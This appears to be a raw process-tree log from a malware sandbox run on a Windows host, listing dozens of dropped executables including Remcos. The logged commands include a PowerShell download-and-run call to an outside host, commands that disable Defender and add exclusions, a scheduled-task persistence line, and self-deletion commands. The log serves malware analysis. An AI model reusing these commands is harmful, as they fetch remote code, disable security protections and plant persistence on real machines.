C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\y2481981.exe
C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\y2481981.exe
7⤵
PID:2692

C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\m2369503.exe
C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\m2369503.exe
8⤵
PID:2228

C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\n3194652.exe
C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\n3194652.exe
7⤵
PID:4668

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
8⤵
PID:1680

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
6⤵
PID:4992

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\i3599072.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\i3599072.exe
3⤵
PID:3820

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
4⤵
PID:1576

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3820 -s 572
4⤵
- Program crash
PID:5036

C:\Users\Admin\AppData\Local\Temp\a\HIKiJuHhHh.exe
"C:\Users\Admin\AppData\Local\Temp\a\HIKiJuHhHh.exe"
2⤵
PID:1236

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
3⤵
PID:5060

C:\Users\Admin\AppData\Local\Temp\a\hkcmd.exe
"C:\Users\Admin\AppData\Local\Temp\a\hkcmd.exe"
2⤵
PID:4320

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Users\Admin\AppData\Local\Temp\a\hkcmd.exe"
3⤵
PID:8428

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Users\Admin\AppData\Local\Temp\a\hkcmd.exe"
3⤵
PID:5700

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Users\Admin\AppData\Local\Temp\a\hkcmd.exe"
3⤵
PID:5640

C:\Users\Admin\AppData\Local\Temp\a\dxpserver.exe
"C:\Users\Admin\AppData\Local\Temp\a\dxpserver.exe"
2⤵
PID:4104

C:\Users\Admin\AppData\Local\Temp\a\assadzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\assadzx.exe"
2⤵
PID:4880

C:\Users\Admin\AppData\Local\Temp\a\assadzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\assadzx.exe"
3⤵
PID:5848

C:\Users\Admin\AppData\Local\Temp\a\YY.exe
"C:\Users\Admin\AppData\Local\Temp\a\YY.exe"
2⤵
PID:3652

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
3⤵
PID:3584

C:\Users\Admin\AppData\Local\Temp\a\SY.exe
"C:\Users\Admin\AppData\Local\Temp\a\SY.exe"
2⤵
PID:4704

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
3⤵
PID:4752

C:\Users\Admin\AppData\Local\Temp\a\cleanmgr.exe
"C:\Users\Admin\AppData\Local\Temp\a\cleanmgr.exe"
2⤵
PID:4860

C:\Users\Admin\AppData\Local\Temp\a\cleanmgr.exe
"C:\Users\Admin\AppData\Local\Temp\a\cleanmgr.exe"
3⤵
PID:388

C:\Users\Admin\AppData\Local\Temp\a\photo250.exe
"C:\Users\Admin\AppData\Local\Temp\a\photo250.exe"
2⤵
PID:1148

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\e8888074.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\e8888074.exe
3⤵
PID:2356

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
4⤵
PID:4816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2356 -s 144
4⤵
- Program crash
PID:5168

C:\Users\Admin\AppData\Local\Temp\a\wininit.exe
"C:\Users\Admin\AppData\Local\Temp\a\wininit.exe"
2⤵
PID:4912

C:\Users\Admin\AppData\Local\Temp\a\remcos_a2.exe
"C:\Users\Admin\AppData\Local\Temp\a\remcos_a2.exe"
2⤵
PID:4796

C:\ProgramData\Rfmcos\rfmcos.exe
"C:\ProgramData\Rfmcos\rfmcos.exe"
3⤵
PID:656

C:\Users\Admin\AppData\Local\Temp\a\bld_4.exe
"C:\Users\Admin\AppData\Local\Temp\a\bld_4.exe"
2⤵
PID:4284

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4284 -s 948
3⤵
- Program crash
PID:4416

C:\Users\Admin\AppData\Local\Temp\a\%E4%BF%A1%E5%A4%A9%E6%B8%B8.exe
"C:\Users\Admin\AppData\Local\Temp\a\%E4%BF%A1%E5%A4%A9%E6%B8%B8.exe"
2⤵
PID:6024

C:\Users\Admin\AppData\Local\Temp\a\fotod25.exe
"C:\Users\Admin\AppData\Local\Temp\a\fotod25.exe"
2⤵
PID:4496

C:\Users\Admin\AppData\Local\Temp\IXP014.TMP\y8636942.exe
C:\Users\Admin\AppData\Local\Temp\IXP014.TMP\y8636942.exe
3⤵
PID:5540

C:\Users\Admin\AppData\Local\Temp\IXP015.TMP\y1324057.exe
C:\Users\Admin\AppData\Local\Temp\IXP015.TMP\y1324057.exe
4⤵
PID:1552

C:\Users\Admin\AppData\Local\Temp\IXP016.TMP\y0826760.exe
C:\Users\Admin\AppData\Local\Temp\IXP016.TMP\y0826760.exe
5⤵
PID:5720

C:\Users\Admin\AppData\Local\Temp\IXP017.TMP\j6801656.exe
C:\Users\Admin\AppData\Local\Temp\IXP017.TMP\j6801656.exe
6⤵
PID:5812

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
7⤵
PID:5360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5812 -s 568
7⤵
- Program crash
PID:5824

C:\Users\Admin\AppData\Local\Temp\IXP017.TMP\k4614215.exe
C:\Users\Admin\AppData\Local\Temp\IXP017.TMP\k4614215.exe
6⤵
PID:6016

C:\Users\Admin\AppData\Local\Temp\IXP016.TMP\l5628297.exe
C:\Users\Admin\AppData\Local\Temp\IXP016.TMP\l5628297.exe
5⤵
PID:2480

C:\Users\Admin\AppData\Local\Temp\IXP015.TMP\m4028820.exe
C:\Users\Admin\AppData\Local\Temp\IXP015.TMP\m4028820.exe
4⤵
PID:6072

C:\Users\Admin\AppData\Local\Temp\IXP014.TMP\n6027702.exe
C:\Users\Admin\AppData\Local\Temp\IXP014.TMP\n6027702.exe
3⤵
PID:6952

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
4⤵
PID:8072

C:\Users\Admin\AppData\Local\Temp\a\game.exe
"C:\Users\Admin\AppData\Local\Temp\a\game.exe"
2⤵
PID:4692

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
3⤵
PID:3144

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 144
3⤵
- Program crash
PID:5240

C:\Users\Admin\AppData\Local\Temp\a\dot.exe
"C:\Users\Admin\AppData\Local\Temp\a\dot.exe"
2⤵
PID:4804

C:\Users\Admin\AppData\Local\Temp\a\metro.exe
"C:\Users\Admin\AppData\Local\Temp\a\metro.exe"
2⤵
PID:5388

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
3⤵
PID:5368

C:\Users\Admin\AppData\Local\Temp\a\sonne.exe
"C:\Users\Admin\AppData\Local\Temp\a\sonne.exe"
2⤵
PID:5784

C:\Users\Admin\AppData\Local\Temp\a\combo.exe
"C:\Users\Admin\AppData\Local\Temp\a\combo.exe"
2⤵
PID:5424

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "combo" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\EsetSecurity\combo.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\a\combo.exe" &&START "" "C:\Users\Admin\AppData\Local\EsetSecurity\combo.exe"
3⤵
PID:5364

C:\Windows\system32\chcp.com
chcp 65001
4⤵
PID:5408

C:\Windows\system32\PING.EXE
ping 127.0.0.1
4⤵
- Runs ping.exe
PID:5576

C:\Windows\system32\schtasks.exe
schtasks /create /tn "combo" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\EsetSecurity\combo.exe" /rl HIGHEST /f
4⤵
- Creates scheduled task(s)
PID:5876

C:\Users\Admin\AppData\Local\EsetSecurity\combo.exe
"C:\Users\Admin\AppData\Local\EsetSecurity\combo.exe"
4⤵
PID:4756

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4756 -s 3244
5⤵
- Program crash
PID:8976

C:\Users\Admin\AppData\Local\Temp\a\HH.exe
"C:\Users\Admin\AppData\Local\Temp\a\HH.exe"
2⤵
PID:4676

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
3⤵
PID:388

C:\Users\Admin\AppData\Local\Temp\a\SS.exe
"C:\Users\Admin\AppData\Local\Temp\a\SS.exe"
2⤵
PID:5132

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
3⤵
PID:4660

C:\Users\Admin\AppData\Local\Temp\a\pmCxohhd.exe
"C:\Users\Admin\AppData\Local\Temp\a\pmCxohhd.exe"
2⤵
PID:876

C:\Users\Admin\AppData\Local\Temp\a\pmCxohhd.exe
C:\Users\Admin\AppData\Local\Temp\a\pmCxohhd.exe
3⤵
PID:1944

C:\Users\Admin\AppData\Local\Temp\a\ghjkl.exe
"C:\Users\Admin\AppData\Local\Temp\a\ghjkl.exe"
2⤵
PID:3092

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQAwAA==
3⤵
PID:5372

C:\Users\Admin\AppData\Local\Temp\Ixgzydftvdfqbldoxvzktk.exe
"C:\Users\Admin\AppData\Local\Temp\Ixgzydftvdfqbldoxvzktk.exe"
3⤵
PID:4608

C:\Users\Admin\AppData\Local\Temp\Ixgzydftvdfqbldoxvzktk.exe
C:\Users\Admin\AppData\Local\Temp\Ixgzydftvdfqbldoxvzktk.exe
4⤵
PID:4084

C:\Users\Admin\AppData\Local\Temp\a\ghjkl.exe
C:\Users\Admin\AppData\Local\Temp\a\ghjkl.exe
3⤵
PID:3040

C:\Users\Admin\AppData\Local\Temp\a\NA.exe
"C:\Users\Admin\AppData\Local\Temp\a\NA.exe"
2⤵
PID:5820

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
3⤵
PID:5248

C:\Users\Admin\AppData\Local\Temp\a\BHHh.exe
"C:\Users\Admin\AppData\Local\Temp\a\BHHh.exe"
2⤵
PID:5056

C:\Users\Admin\AppData\Local\Temp\a\A.exe
"C:\Users\Admin\AppData\Local\Temp\a\A.exe"
2⤵
PID:5800

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
3⤵
PID:5976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5976 -s 1520
4⤵
- Program crash
PID:3720

C:\Users\Admin\AppData\Local\Temp\a\BBHhHhB.exe
"C:\Users\Admin\AppData\Local\Temp\a\BBHhHhB.exe"
2⤵
PID:5008

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\YYY.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\YYY.exe"
3⤵
PID:2808

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
4⤵
PID:1156

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 1 & Del "C:\Users\Admin\AppData\Local\Temp\a\BBHhHhB.exe"
3⤵
PID:3084

C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 1
4⤵
PID:5628

C:\Users\Admin\AppData\Local\Temp\a\G.exe
"C:\Users\Admin\AppData\Local\Temp\a\G.exe"
2⤵
PID:4756

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\YYY.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\YYY.exe"
3⤵
PID:4076

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
4⤵
PID:4660

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 1 & Del "C:\Users\Admin\AppData\Local\Temp\a\G.exe"
3⤵
PID:4808

C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 1
4⤵
PID:3100

C:\Users\Admin\AppData\Local\Temp\a\HHGgG.exe
"C:\Users\Admin\AppData\Local\Temp\a\HHGgG.exe"
2⤵
PID:4164

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
3⤵
PID:4932

C:\Users\Admin\AppData\Local\Temp\a\BMKNJPO87.exe
"C:\Users\Admin\AppData\Local\Temp\a\BMKNJPO87.exe"
2⤵
PID:1952

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
3⤵
PID:1412

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
3⤵
PID:3832

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
3⤵
PID:4716

C:\Users\Admin\AppData\Local\Temp\a\H.exe
"C:\Users\Admin\AppData\Local\Temp\a\H.exe"
2⤵
PID:4704

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
3⤵
PID:5440

C:\Users\Admin\AppData\Local\Temp\a\88999.exe
"C:\Users\Admin\AppData\Local\Temp\a\88999.exe"
2⤵
PID:4484

C:\Program Files (x86)\Microsoft Efxkgq\Evnagqb.com
"C:\Program Files (x86)\Microsoft Efxkgq\Evnagqb.com"
3⤵
PID:5488

C:\Users\Admin\AppData\Local\Temp\a\YYY.exe
"C:\Users\Admin\AppData\Local\Temp\a\YYY.exe"
2⤵
PID:1832

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
3⤵
PID:6056

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
3⤵
PID:4308

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
3⤵
PID:3048

C:\Users\Admin\AppData\Local\Temp\a\Installer.exe
"C:\Users\Admin\AppData\Local\Temp\a\Installer.exe"
2⤵
PID:4412

C:\Windows\system32\notepad.exe
"C:\Windows\system32\notepad.exe"
3⤵
PID:9076

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --no-first-run --no-default-browser-check --noerrdialogs --disable-backgrounding-occluded-windows --disable-background-timer-throttling --disable-background-networking --disable-extensions-http-throttling --disable-renderer-backgrounding --disable-audio-output --disable-breakpad --disable-sync --silent-launch --restore-last-session --ran-launcher --profile-directory="Default"
4⤵
PID:6716

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xd0,0xd4,0xd8,0xac,0xdc,0x7ffe8b6c9758,0x7ffe8b6c9768,0x7ffe8b6c9778
5⤵
PID:5780

C:\Windows\SysWOW64\cmmon32.exe
"C:\Windows\SysWOW64\cmmon32.exe"
2⤵
PID:5344

C:\Program Files\Mozilla Firefox\Firefox.exe
"C:\Program Files\Mozilla Firefox\Firefox.exe"
3⤵
PID:3040

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3040 -s 460
4⤵
- Program crash
PID:6276

C:\Users\Admin\AppData\Local\Temp\a\1.exe
"C:\Users\Admin\AppData\Local\Temp\a\1.exe"
2⤵
PID:6096

C:\Users\Admin\AppData\Local\Temp\a\secmorganzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\secmorganzx.exe"
2⤵
PID:4732

C:\Users\Admin\AppData\Local\Temp\a\H2.exe
"C:\Users\Admin\AppData\Local\Temp\a\H2.exe"
2⤵
PID:3704

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
3⤵
PID:4044

C:\Users\Admin\AppData\Local\Temp\Remcos\remcos.exe
"C:\Users\Admin\AppData\Local\Temp\Remcos\remcos.exe"
4⤵
PID:4968

C:\Users\Admin\AppData\Local\Temp\a\2.exe
"C:\Users\Admin\AppData\Local\Temp\a\2.exe"
2⤵
PID:3364

C:\Users\Admin\AppData\Local\Temp\a\teambzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\teambzx.exe"
2⤵
PID:2204

C:\Users\Admin\AppData\Local\Temp\a\teambzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\teambzx.exe"
3⤵
PID:6916

C:\Users\Admin\AppData\Local\Temp\a\cc.exe
"C:\Users\Admin\AppData\Local\Temp\a\cc.exe"
2⤵
PID:796

C:\Users\Admin\AppData\Local\Temp\a\WindowsApp1.exe
"C:\Users\Admin\AppData\Local\Temp\a\WindowsApp1.exe"
2⤵
PID:4152

C:\Users\Admin\AppData\Local\Temp\a\M.exe
"C:\Users\Admin\AppData\Local\Temp\a\M.exe"
2⤵
PID:2004

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
3⤵
PID:5888

C:\Users\Admin\AppData\Local\Temp\a\ga.exe
"C:\Users\Admin\AppData\Local\Temp\a\ga.exe"
2⤵
PID:4660

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
3⤵
PID:3764

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
3⤵
PID:768

C:\Users\Admin\AppData\Local\Temp\a\Nano.exe
"C:\Users\Admin\AppData\Local\Temp\a\Nano.exe"
2⤵
PID:6064

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
3⤵
PID:604

C:\Users\Admin\AppData\Local\Temp\a\agodzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\agodzx.exe"
2⤵
PID:3764

C:\Users\Admin\AppData\Local\Temp\a\agodzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\agodzx.exe"
3⤵
PID:7144

C:\Users\Admin\AppData\Local\Temp\a\smss.exe
"C:\Users\Admin\AppData\Local\Temp\a\smss.exe"
2⤵
PID:4560

C:\Users\Admin\AppData\Local\Temp\a\smss.exe
"C:\Users\Admin\AppData\Local\Temp\a\smss.exe"
3⤵
PID:3000

C:\Users\Admin\AppData\Local\Temp\a\R.exe
"C:\Users\Admin\AppData\Local\Temp\a\R.exe"
2⤵
PID:4756

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
3⤵
PID:2996

C:\Users\Admin\AppData\Local\Temp\a\ar.exe
"C:\Users\Admin\AppData\Local\Temp\a\ar.exe"
2⤵
PID:4716

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
3⤵
PID:3388

C:\Users\Admin\AppData\Local\Temp\a\ARR.exe
"C:\Users\Admin\AppData\Local\Temp\a\ARR.exe"
2⤵
PID:4696

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
3⤵
PID:6380

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
3⤵
PID:6448

C:\Users\Admin\AppData\Local\Temp\a\D.exe
"C:\Users\Admin\AppData\Local\Temp\a\D.exe"
2⤵
PID:5740

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
3⤵
PID:6500

C:\Users\Admin\AppData\Local\Temp\a\ogumbgejapxd.exe
"C:\Users\Admin\AppData\Local\Temp\a\ogumbgejapxd.exe"
2⤵
PID:6724

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Local\Temp\a\ogumbgejapxd.exe
3⤵
PID:1780

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 0
4⤵
PID:6460

C:\Users\Admin\AppData\Local\Temp\a\jokerzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\jokerzx.exe"
2⤵
PID:708

C:\Users\Admin\AppData\Local\Temp\a\jokerzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\jokerzx.exe"
3⤵
PID:6364

C:\Users\Admin\AppData\Local\Temp\a\ventascry.exe
"C:\Users\Admin\AppData\Local\Temp\a\ventascry.exe"
2⤵
PID:6528

C:\Users\Admin\AppData\Local\Temp\a\ventascry.exe
"C:\Users\Admin\AppData\Local\Temp\a\ventascry.exe"
3⤵
PID:6500

C:\Users\Admin\AppData\Local\Temp\a\wasx.exe
"C:\Users\Admin\AppData\Local\Temp\a\wasx.exe"
2⤵
PID:6552

C:\Users\Admin\AppData\Local\Temp\a\wasx.exe
"C:\Users\Admin\AppData\Local\Temp\a\wasx.exe"
3⤵
PID:2788

C:\Users\Admin\AppData\Local\Temp\a\postmon.exe
"C:\Users\Admin\AppData\Local\Temp\a\postmon.exe"
2⤵
PID:6444

C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://transparenciacanaa.com.br/cidadejunina/js/vendor/debug2.ps1')"
3⤵
PID:7044

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command IEX(New-Object Net.Webclient).DownloadString('https://transparenciacanaa.com.br/cidadejunina/js/vendor/debug2.ps1')
4⤵
PID:6712

C:\Users\Admin\AppData\Local\Temp\a\Facebook.exe
"C:\Users\Admin\AppData\Local\Temp\a\Facebook.exe"
2⤵
PID:3992

C:\Users\Admin\AppData\Local\Temp\a\fristname.exe
"C:\Users\Admin\AppData\Local\Temp\a\fristname.exe"
2⤵
PID:7080

C:\Users\Admin\AppData\Local\Temp\Builtt.exe
"C:\Users\Admin\AppData\Local\Temp\Builtt.exe"
3⤵
PID:6720

C:\Users\Admin\AppData\Local\Temp\Builtt.exe
"C:\Users\Admin\AppData\Local\Temp\Builtt.exe"
4⤵
PID:2812

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "net session"
5⤵
PID:5840

C:\Windows\system32\net.exe
net session
6⤵
PID:7972

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
7⤵
PID:7764

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Builtt.exe'"
5⤵
PID:6364

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Builtt.exe'
6⤵
PID:9100

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "start bound.exe"
5⤵
PID:7184

C:\Users\Admin\AppData\Local\Temp\bound.exe
bound.exe
6⤵
PID:8488

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
5⤵
PID:4704

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
6⤵
PID:8792

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
5⤵
PID:5540

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
6⤵
PID:8784

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
5⤵
PID:7744

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
6⤵
- Enumerates processes with tasklist
PID:6236

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
5⤵
PID:5220

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
6⤵
PID:7212

C:\Users\Admin\AppData\Local\Temp\BitDefendMS.exe
"C:\Users\Admin\AppData\Local\Temp\BitDefendMS.exe"
3⤵
PID:7060

C:\Users\Admin\AppData\Local\Temp\ae3108e6c23af96b9aac776041f0203a.exe
"C:\Users\Admin\AppData\Local\Temp\ae3108e6c23af96b9aac776041f0203a.exe"
3⤵
PID:6752

C:\Users\Admin\AppData\Local\Temp\a\WWW3_64.exe
"C:\Users\Admin\AppData\Local\Temp\a\WWW3_64.exe"
2⤵
PID:6632

C:\Users\Admin\AppData\Local\Temp\a\trust.exe
"C:\Users\Admin\AppData\Local\Temp\a\trust.exe"
2⤵
PID:6108

C:\Users\Admin\AppData\Local\Temp\a\aaa1.exe
"C:\Users\Admin\AppData\Local\Temp\a\aaa1.exe"
2⤵
PID:5380

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
3⤵
PID:3684

C:\Users\Admin\AppData\Local\Temp\a\crypted.exe
"C:\Users\Admin\AppData\Local\Temp\a\crypted.exe"
2⤵
PID:4008

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
3⤵
PID:8140

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
3⤵
PID:4496

C:\Users\Admin\AppData\Local\Temp\a\netTime.exe
"C:\Users\Admin\AppData\Local\Temp\a\netTime.exe"
2⤵
PID:1760

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
3⤵
PID:6420

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
3⤵
PID:7364

C:\Users\Admin\AppData\Local\Temp\a\tg.exe
